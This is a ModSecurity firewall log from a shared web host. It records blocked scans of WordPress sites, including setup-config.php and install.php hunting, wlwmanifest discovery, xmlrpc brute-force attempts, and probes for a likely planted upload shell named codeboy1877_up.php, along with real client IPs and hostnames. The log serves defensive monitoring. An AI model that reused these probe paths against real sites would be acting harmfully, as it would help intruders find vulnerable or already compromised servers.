[Tue May 26 15:46:35.522848 2026] [security2:error] [pid 747840:tid 748009] [client 103.153.130.62:61760] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzA4m6MwAuYuZKxvnjMwAAATE"]
[Tue May 26 15:46:36.032696 2026] [security2:error] [pid 747840:tid 747981] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzA4m6MwAuYuZKxvnjNgAAARU"]
[Tue May 26 15:46:36.292404 2026] [security2:error] [pid 745492:tid 745667] [client 88.151.32.54:56716] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwaQAAAK8"]
[Tue May 26 15:46:36.321730 2026] [security2:error] [pid 745492:tid 745641] [client 88.151.32.54:56780] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwfQAAAJU"]
[Tue May 26 15:46:36.336264 2026] [security2:error] [pid 747840:tid 748019] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8Im6MwAuYuZKxvnhmQAAATs"]
[Tue May 26 15:46:36.386546 2026] [security2:error] [pid 745492:tid 745694] [client 88.151.32.54:56778] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJweAAAAMo"]
[Tue May 26 15:46:37.200287 2026] [security2:error] [pid 747840:tid 748095] [client 143.110.243.118:57710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/yoi.php"] [unique_id "ahVzBYm6MwAuYuZKxvnjUwAAAYc"]
[Tue May 26 15:46:37.306853 2026] [security2:error] [pid 745492:tid 745708] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwlQAAANg"]
[Tue May 26 15:46:37.956132 2026] [security2:error] [pid 745492:tid 745637] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzBYmEQglTmoWcfxJx2QAAAJE"]
[Tue May 26 15:46:38.295987 2026] [security2:error] [pid 745492:tid 745726] [client 88.151.32.54:56792] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwZAAAAOo"]
[Tue May 26 15:46:38.387373 2026] [security2:error] [pid 745492:tid 745650] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwdAAAAJ4"]
[Tue May 26 15:46:39.176427 2026] [security2:error] [pid 747840:tid 748015] [client 14.229.109.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzBom6MwAuYuZKxvnjcAAAATc"]
[Tue May 26 15:46:39.240412 2026] [security2:error] [pid 747840:tid 748073] [client 173.252.82.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVzBom6MwAuYuZKxvnjcwAAAXE"]
[Tue May 26 15:46:39.397344 2026] [security2:error] [pid 747840:tid 748017] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8Im6MwAuYuZKxvnhmgAAATk"]
[Tue May 26 15:46:40.277243 2026] [security2:error] [pid 745492:tid 745636] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwmAAAAJA"]
[Tue May 26 15:46:40.401246 2026] [security2:error] [pid 747840:tid 747972] [client 34.24.91.150:57406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.91.24.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/xmlrpc.php"] [unique_id "ahVzCIm6MwAuYuZKxvnjiQAAAQw"]
[Tue May 26 15:46:40.666286 2026] [security2:error] [pid 747840:tid 748091] [client 34.24.91.150:58288] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "svijaykumar.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVzCIm6MwAuYuZKxvnjmQAAAYM"]
[Tue May 26 15:46:40.808710 2026] [security2:error] [pid 745492:tid 745727] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzCImEQglTmoWcfxJyAAAAAOs"]
[Tue May 26 15:46:40.862175 2026] [security2:error] [pid 747840:tid 748059] [client 34.24.91.150:63967] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "svijaykumar.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVzCIm6MwAuYuZKxvnjnAAAAWM"]
[Tue May 26 15:46:40.944439 2026] [security2:error] [pid 747840:tid 748080] [client 173.252.82.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVzCIm6MwAuYuZKxvnjmAAAAXg"]
[Tue May 26 15:46:41.171762 2026] [security2:error] [pid 745492:tid 745663] [client 34.24.91.150:62624] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "svijaykumar.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVzCYmEQglTmoWcfxJyCQAAAKs"]
[Tue May 26 15:46:41.363822 2026] [security2:error] [pid 745492:tid 745647] [client 143.110.243.118:56468] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/wp-admin/codeboy1877_up.php"] [unique_id "ahVzCYmEQglTmoWcfxJyCwAAAJs"]
[Tue May 26 15:46:41.554080 2026] [security2:error] [pid 747840:tid 748077] [client 34.24.91.150:49853] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "svijaykumar.in"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVzCYm6MwAuYuZKxvnjogAAAXU"]
[Tue May 26 15:46:41.609048 2026] [security2:error] [pid 747840:tid 748015] [client 223.123.35.44:36213] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzCYm6MwAuYuZKxvnjpAAAATc"]
[Tue May 26 15:46:41.609171 2026] [security2:error] [pid 747840:tid 748015] [client 223.123.35.44:36213] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzCYm6MwAuYuZKxvnjpAAAATc"]
[Tue May 26 15:46:41.760763 2026] [security2:error] [pid 745492:tid 745748] [client 34.24.91.150:61102] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "svijaykumar.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVzCYmEQglTmoWcfxJyEAAAAQA"]
[Tue May 26 15:46:41.989540 2026] [security2:error] [pid 745492:tid 745726] [client 34.24.91.150:61786] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "svijaykumar.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVzCYmEQglTmoWcfxJyEQAAAOo"]
[Tue May 26 15:46:42.279855 2026] [security2:error] [pid 745492:tid 745651] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-ImEQglTmoWcfxJxJAAAAJ8"]
[Tue May 26 15:46:42.302851 2026] [security2:error] [pid 745492:tid 745700] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwlAAAANA"]
[Tue May 26 15:46:42.306675 2026] [security2:error] [pid 745492:tid 745702] [client 34.24.91.150:60593] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "svijaykumar.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVzComEQglTmoWcfxJyEwAAANI"]
[Tue May 26 15:46:42.801076 2026] [security2:error] [pid 745492:tid 745694] [client 34.24.91.150:53449] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "svijaykumar.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVzComEQglTmoWcfxJyGgAAAMo"]
[Tue May 26 15:46:42.828737 2026] [security2:error] [pid 745492:tid 745680] [client 54.205.63.235:61870] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "premium-homesdxb.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVzComEQglTmoWcfxJyHQAAALw"]
[Tue May 26 15:46:42.909499 2026] [security2:error] [pid 745492:tid 745695] [client 54.205.63.235:62305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "premium-homesdxb.com"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahVzComEQglTmoWcfxJyIAAAAMs"]
[Tue May 26 15:46:42.909499 2026] [security2:error] [pid 747840:tid 748080] [client 54.205.63.235:62304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "premium-homesdxb.com"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahVzCom6MwAuYuZKxvnjxAAAAXg"]
[Tue May 26 15:46:42.909725 2026] [security2:error] [pid 747840:tid 748089] [client 54.205.63.235:62308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "premium-homesdxb.com"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahVzCom6MwAuYuZKxvnjxgAAAYE"]
[Tue May 26 15:46:42.909848 2026] [security2:error] [pid 747840:tid 748022] [client 54.205.63.235:62309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "premium-homesdxb.com"] [uri "/wp-admin/install.php"] [unique_id "ahVzCom6MwAuYuZKxvnjyAAAAT4"]
[Tue May 26 15:46:42.909885 2026] [security2:error] [pid 747840:tid 747979] [client 54.205.63.235:62307] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "premium-homesdxb.com"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahVzCom6MwAuYuZKxvnjxwAAARM"]
[Tue May 26 15:46:42.909976 2026] [security2:error] [pid 747840:tid 748086] [client 54.205.63.235:62306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "premium-homesdxb.com"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahVzCom6MwAuYuZKxvnjxQAAAX4"]
[Tue May 26 15:46:42.910106 2026] [security2:error] [pid 747840:tid 748053] [client 54.205.63.235:62303] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "premium-homesdxb.com"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahVzCom6MwAuYuZKxvnjyQAAAV0"]
[Tue May 26 15:46:42.910262 2026] [security2:error] [pid 745492:tid 745695] [client 54.205.63.235:62312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "premium-homesdxb.com"] [uri "/staging/wp-admin/install.php"] [unique_id "ahVzComEQglTmoWcfxJyIQAAAMs"]
[Tue May 26 15:46:42.910363 2026] [security2:error] [pid 747840:tid 748013] [client 54.205.63.235:62310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "premium-homesdxb.com"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahVzCom6MwAuYuZKxvnjygAAATU"]
[Tue May 26 15:46:42.910582 2026] [security2:error] [pid 747840:tid 748083] [client 54.205.63.235:62313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "premium-homesdxb.com"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahVzCom6MwAuYuZKxvnjywAAAXs"]
[Tue May 26 15:46:42.910695 2026] [security2:error] [pid 745492:tid 745692] [client 54.205.63.235:62311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "premium-homesdxb.com"] [uri "/old/wp-admin/install.php"] [unique_id "ahVzComEQglTmoWcfxJyIgAAAMg"]
[Tue May 26 15:46:42.910898 2026] [security2:error] [pid 745492:tid 745713] [client 54.205.63.235:62314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "premium-homesdxb.com"] [uri "/wp/wp-admin/install.php"] [unique_id "ahVzComEQglTmoWcfxJyIwAAAN0"]
[Tue May 26 15:46:42.911190 2026] [security2:error] [pid 747840:tid 748030] [client 54.205.63.235:62315] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "premium-homesdxb.com"] [uri "/backup/wp-admin/install.php"] [unique_id "ahVzCom6MwAuYuZKxvnjzQAAAUY"]
[Tue May 26 15:46:42.911359 2026] [security2:error] [pid 747840:tid 747996] [client 54.205.63.235:62316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "premium-homesdxb.com"] [uri "/demo/wp-admin/install.php"] [unique_id "ahVzCom6MwAuYuZKxvnjzAAAASQ"]
[Tue May 26 15:46:42.987440 2026] [security2:error] [pid 747840:tid 748067] [client 54.205.63.235:62446] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "premium-homesdxb.com"] [uri "/test/wp-admin/install.php"] [unique_id "ahVzCom6MwAuYuZKxvnjzgAAAWs"]
[Tue May 26 15:46:43.234443 2026] [security2:error] [pid 747840:tid 747984] [client 34.24.91.150:57344] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "svijaykumar.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVzC4m6MwAuYuZKxvnj2AAAARg"]
[Tue May 26 15:46:43.264228 2026] [security2:error] [pid 747840:tid 748088] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzCom6MwAuYuZKxvnjwgAAAYA"]
[Tue May 26 15:46:43.420697 2026] [security2:error] [pid 747840:tid 748065] [client 34.24.91.150:57041] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "svijaykumar.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVzC4m6MwAuYuZKxvnj2QAAAWk"]
[Tue May 26 15:46:44.306662 2026] [security2:error] [pid 745492:tid 745645] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwgQAAAJk"]
[Tue May 26 15:46:44.921055 2026] [security2:error] [pid 747840:tid 748081] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzDIm6MwAuYuZKxvnj9wAAAXk"]
[Tue May 26 15:46:45.278838 2026] [security2:error] [pid 745492:tid 745732] [client 88.151.32.54:56892] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-ImEQglTmoWcfxJxKAAAAPA"]
[Tue May 26 15:46:45.278898 2026] [security2:error] [pid 745492:tid 745714] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwiwAAAN4"]
[Tue May 26 15:46:45.384219 2026] [security2:error] [pid 747840:tid 748035] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-Im6MwAuYuZKxvniUAAAAUs"]
[Tue May 26 15:46:45.472856 2026] [security2:error] [pid 747840:tid 747971] [client 143.110.243.118:56474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/wp-includes/codeboy1877_up.php"] [unique_id "ahVzDYm6MwAuYuZKxvnkDAAAAQs"]
[Tue May 26 15:46:45.913018 2026] [security2:error] [pid 745492:tid 745646] [client 103.153.130.62:62070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzDYmEQglTmoWcfxJyRgAAAJo"]
[Tue May 26 15:46:45.913171 2026] [security2:error] [pid 745492:tid 745646] [client 103.153.130.62:62070] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzDYmEQglTmoWcfxJyRgAAAJo"]
[Tue May 26 15:46:45.928800 2026] [security2:error] [pid 747840:tid 747993] [client 178.20.45.182:52137] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "178.20.45.182" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVzDYm6MwAuYuZKxvnkEwAAASE"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 15:46:45.928875 2026] [security2:error] [pid 747840:tid 747993] [client 178.20.45.182:52137] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVzDYm6MwAuYuZKxvnkEwAAASE"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 15:46:46.278264 2026] [security2:error] [pid 747840:tid 748027] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8Im6MwAuYuZKxvnhnAAAAUM"]
[Tue May 26 15:46:46.300696 2026] [security2:error] [pid 745492:tid 745716] [client 88.151.32.54:56860] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-ImEQglTmoWcfxJxLwAAAOA"]
[Tue May 26 15:46:46.313852 2026] [security2:error] [pid 745492:tid 745689] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwmQAAAMU"]
